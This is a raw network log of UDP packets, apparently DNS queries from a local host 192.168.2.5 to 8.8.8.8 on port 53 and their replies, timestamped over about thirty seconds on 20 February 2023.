Feb 20, 2023 09:51:41.902633905 CET	53	60186	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.920164108 CET	60187	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.937182903 CET	53	60187	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:42.008272886 CET	60188	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:42.014559031 CET	60189	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:42.021549940 CET	60190	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:42.028608084 CET	53	60188	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:42.033691883 CET	53	60189	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:42.036990881 CET	60284	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:42.039563894 CET	53	60190	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:42.064852953 CET	53	60284	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:42.083780050 CET	60285	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:42.103827953 CET	53	60285	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:42.124537945 CET	60286	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:42.142581940 CET	53	60286	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:42.239579916 CET	60287	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:42.252017975 CET	60288	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:42.256741047 CET	53	60287	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:42.278348923 CET	53	60288	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:42.283993959 CET	60019	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:42.310874939 CET	53	60019	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:42.332928896 CET	60020	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:42.353302956 CET	53	60020	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:42.426815033 CET	60021	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:42.445522070 CET	53	60021	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:42.526510954 CET	60022	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:42.527329922 CET	60023	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:42.544234991 CET	53	60022	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:42.545999050 CET	53	60023	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:42.688500881 CET	60024	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:42.717551947 CET	53	60024	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:42.803039074 CET	60025	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:42.820694923 CET	53	60025	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:42.901449919 CET	60026	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:42.919163942 CET	53	60026	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:43.005853891 CET	60027	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:43.023611069 CET	53	60027	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:43.040033102 CET	60028	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:43.063082933 CET	53	60028	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:43.089804888 CET	60029	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:43.109980106 CET	53	60029	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:43.120529890 CET	50902	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:43.143325090 CET	53	50902	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:43.217456102 CET	50903	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:43.231324911 CET	50904	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:43.237247944 CET	53	50903	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:43.248415947 CET	53	50904	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:43.344580889 CET	50905	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:43.351114035 CET	50906	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:43.362478971 CET	50907	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:43.368380070 CET	53	50906	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:43.380309105 CET	53	50907	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:43.432002068 CET	53	50905	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:43.438977003 CET	53823	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:43.456670046 CET	53	53823	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:43.489866972 CET	53824	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:43.509617090 CET	53	53824	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:43.582604885 CET	53825	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:43.599710941 CET	53	53825	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:43.770529985 CET	53826	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:43.777496099 CET	53827	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:43.791721106 CET	53	53826	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:43.794871092 CET	53	53827	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:43.795171976 CET	49769	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:43.812741995 CET	53	49769	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:44.005565882 CET	49770	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:44.023159027 CET	53	49770	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:44.882313013 CET	49771	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:44.899636030 CET	53	49771	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:45.094935894 CET	49772	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:45.116029024 CET	53	49772	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:45.188195944 CET	49773	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:45.209690094 CET	53	49773	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:45.296075106 CET	49774	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:45.302634001 CET	49775	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:45.303324938 CET	49776	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:45.312025070 CET	49777	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:45.313098907 CET	53	49774	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:45.321753979 CET	53	49775	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:45.322462082 CET	53	49776	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:45.348891973 CET	53	49777	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:45.456296921 CET	49778	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:45.464626074 CET	49779	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:45.464906931 CET	49780	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:45.484033108 CET	53	49779	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:45.492070913 CET	53	49778	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:45.495409966 CET	53	49780	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:45.495589972 CET	49579	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:45.545022964 CET	53	49579	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:45.903682947 CET	49580	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:45.910495996 CET	49581	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:45.930321932 CET	53	49581	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:45.936439991 CET	53555	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:45.938560009 CET	53	49580	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:45.965874910 CET	53	53555	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:45.993393898 CET	53556	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:46.012490988 CET	53	53556	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:46.185982943 CET	53557	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:46.215348959 CET	53	53557	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:46.220830917 CET	61293	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:46.244313955 CET	53	61293	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:46.606086016 CET	61294	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:46.625804901 CET	53	61294	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:46.742384911 CET	61295	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:46.761931896 CET	53	61295	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:46.830780983 CET	61296	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:46.855139971 CET	53	61296	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:46.942373037 CET	61297	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:46.963041067 CET	53	61297	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:46.967318058 CET	50086	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:46.998301983 CET	53	50086	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:47.244208097 CET	50087	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:47.268522024 CET	53	50087	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:47.272074938 CET	52188	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:47.294346094 CET	53	52188	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:47.431310892 CET	52189	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:47.449218035 CET	53	52189	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:49.101991892 CET	54586	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:49.119479895 CET	53	54586	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:50.402276039 CET	54587	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:50.420150995 CET	53	54587	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:50.507515907 CET	54588	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:50.528606892 CET	53	54588	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:50.634474039 CET	54589	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:50.652158022 CET	53	54589	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:51.180654049 CET	54590	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:51.198323011 CET	53	54590	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:52.700098038 CET	54591	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:52.712379932 CET	54592	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:52.717082977 CET	53	54591	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:52.731527090 CET	53	54592	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:54.026125908 CET	54593	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:54.041403055 CET	54594	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:54.049035072 CET	53	54593	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:54.059343100 CET	53	54594	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:54.789928913 CET	54595	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:54.798712015 CET	54596	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:54.809479952 CET	53	54595	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:54.820667028 CET	53	54596	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:54.893554926 CET	54597	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:54.917351961 CET	53	54597	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:54.991691113 CET	54598	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:55.035079002 CET	53	54598	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:55.037863016 CET	52100	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:55.105993032 CET	53	52100	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:55.648137093 CET	52101	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:55.667205095 CET	53	52101	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:56.422400951 CET	52102	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:56.441643953 CET	53	52102	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:56.543185949 CET	52103	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:56.562169075 CET	53	52103	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:56.831571102 CET	52104	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:56.885015965 CET	53	52104	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:56.945422888 CET	60908	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:57.011260033 CET	53	60908	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:58.539057970 CET	60909	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:58.556653976 CET	53	60909	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:58.763895988 CET	60910	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:58.780879021 CET	53	60910	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:59.072921038 CET	60911	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:59.091945887 CET	53	60911	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:59.176976919 CET	60912	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:59.198041916 CET	53	60912	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:59.429430962 CET	60913	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:59.459338903 CET	53	60913	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:59.461935043 CET	58623	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:59.481595993 CET	53	58623	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:00.055669069 CET	58624	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:00.076492071 CET	53	58624	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:00.093592882 CET	58625	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:00.141222954 CET	53	58625	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:00.171664000 CET	58626	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:00.188874960 CET	53	58626	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:00.235704899 CET	58627	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:00.257528067 CET	53	58627	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:00.275805950 CET	58628	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:00.337255955 CET	53	58628	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:00.339647055 CET	65493	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:00.366581917 CET	53	65493	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:00.421890020 CET	65494	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:00.438879013 CET	53	65494	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:00.517992973 CET	65495	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:00.535114050 CET	53	65495	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:01.389568090 CET	65496	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:01.408648014 CET	53	65496	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:01.630146027 CET	65497	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:01.647650003 CET	53	65497	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:01.739080906 CET	65498	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:01.759143114 CET	53	65498	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:01.781980991 CET	65499	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:01.815399885 CET	53	65499	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:01.935786963 CET	65500	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:01.941696882 CET	65501	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:01.958424091 CET	53	65500	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:01.964302063 CET	53	65501	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:02.290122032 CET	65502	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:02.292325020 CET	65503	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:02.309413910 CET	53	65503	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:02.329271078 CET	53	65502	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:02.332462072 CET	57482	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:02.377228022 CET	53	57482	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:02.533541918 CET	57483	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:02.582439899 CET	53	57483	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:02.688110113 CET	57484	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:02.705749035 CET	53	57484	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:02.875051022 CET	57485	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:02.894155025 CET	53	57485	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:02.997689009 CET	57486	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:03.014728069 CET	53	57486	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:03.078491926 CET	57487	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:03.112873077 CET	53	57487	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:03.263006926 CET	52096	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:03.281033993 CET	53	52096	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:03.556730032 CET	52097	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:03.575809956 CET	53	52097	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:04.077861071 CET	52098	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:04.121889114 CET	53	52098	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:04.126305103 CET	62057	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:04.231123924 CET	53	62057	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:04.673842907 CET	62058	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:04.691466093 CET	53	62058	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:04.759416103 CET	62059	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:04.781182051 CET	53	62059	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:04.787945032 CET	60294	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:04.807070971 CET	53	60294	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:04.853368044 CET	63728	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:04.892699957 CET	53	63728	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:06.060075045 CET	63730	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:06.079790115 CET	53	63730	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:06.173703909 CET	50078	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:06.367074966 CET	53	50078	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:06.591150045 CET	50079	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:06.608831882 CET	53	50079	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:06.671349049 CET	50080	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:06.705336094 CET	53	50080	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:06.707902908 CET	49959	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:06.725514889 CET	53	49959	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:06.991269112 CET	49960	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:07.010390043 CET	53	49960	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:08.035619974 CET	49961	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:08.052930117 CET	53	49961	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:08.256457090 CET	49962	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:08.277086020 CET	53	49962	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:08.374428034 CET	49963	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:08.387087107 CET	49964	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:08.393548012 CET	53	49963	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:08.404441118 CET	53	49964	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:08.489018917 CET	49965	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:08.508146048 CET	53	49965	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:08.598915100 CET	49966	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:08.607754946 CET	49967	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:08.615914106 CET	53	49966	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:08.624885082 CET	53	49967	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:08.715301037 CET	49968	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:08.738111973 CET	53	49968	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:08.798008919 CET	49969	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:08.801836014 CET	49970	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:08.815630913 CET	53	49969	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:08.819185972 CET	53	49970	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:08.836277008 CET	49971	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:08.858380079 CET	53	49971	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:08.984890938 CET	49972	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:09.001920938 CET	53	49972	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:09.010449886 CET	49973	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:09.027797937 CET	53	49973	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:09.078521967 CET	49974	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:09.095581055 CET	53	49974	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:09.469206095 CET	49976	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:09.475375891 CET	49977	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:09.481149912 CET	49978	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:09.486629009 CET	55609	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:09.488239050 CET	53	49976	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:09.489204884 CET	55610	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:09.498548031 CET	53	49978	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:09.499572039 CET	53	49977	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:09.506381035 CET	53	55609	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:09.529721022 CET	53	55610	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:09.532263994 CET	58872	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:09.563504934 CET	53	58872	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:09.889580965 CET	58873	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:09.893265009 CET	58874	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:09.899550915 CET	58875	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:09.905050039 CET	58876	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:09.912162066 CET	53	58874	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:09.917278051 CET	53	58875	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:09.928314924 CET	53	58876	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:09.940112114 CET	53	58873	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:10.005204916 CET	58877	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:10.011732101 CET	58878	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:10.028203964 CET	53	58877	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:10.094343901 CET	58879	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:10.102705002 CET	58880	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:10.113413095 CET	53	58878	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:10.113794088 CET	53	58879	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:10.117830992 CET	52892	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:10.119867086 CET	53	58880	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:10.135394096 CET	53	52892	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:10.919219017 CET	65331	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:10.919554949 CET	65332	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:10.919665098 CET	65333	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:10.936453104 CET	53	65331	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:10.936486006 CET	53	65332	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:10.939161062 CET	53	65333	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:11.014442921 CET	65334	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:11.033415079 CET	53	65334	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:11.105421066 CET	65335	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:11.115976095 CET	65336	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:11.118710995 CET	65337	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:11.134820938 CET	53	65336	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:11.136253119 CET	53	65337	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:11.151743889 CET	53	65335	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:12.577239037 CET	65338	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:12.598361015 CET	53	65338	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:12.673945904 CET	65339	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:12.674037933 CET	65340	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:12.674097061 CET	65341	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:12.691003084 CET	53	65339	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:12.694283962 CET	53	65341	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:12.710670948 CET	53	65340	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:12.723931074 CET	65342	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:12.727073908 CET	52973	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:12.733110905 CET	52974	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:12.746012926 CET	53	52973	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:12.746089935 CET	53	65342	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:12.837760925 CET	53	52974	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:12.981264114 CET	50005	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:13.154414892 CET	53	50005	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:13.266091108 CET	50006	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:13.268438101 CET	50007	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:13.268997908 CET	50008	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:13.269803047 CET	50009	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:13.286526918 CET	53	50006	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:13.286765099 CET	53	50009	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:13.289722919 CET	53	50008	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:13.301683903 CET	53	50007	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:13.901352882 CET	50010	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:13.918652058 CET	53	50010	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:13.978583097 CET	50011	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:13.978663921 CET	50012	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:13.986027002 CET	50013	53	192.168.2.5	8.8.8.8
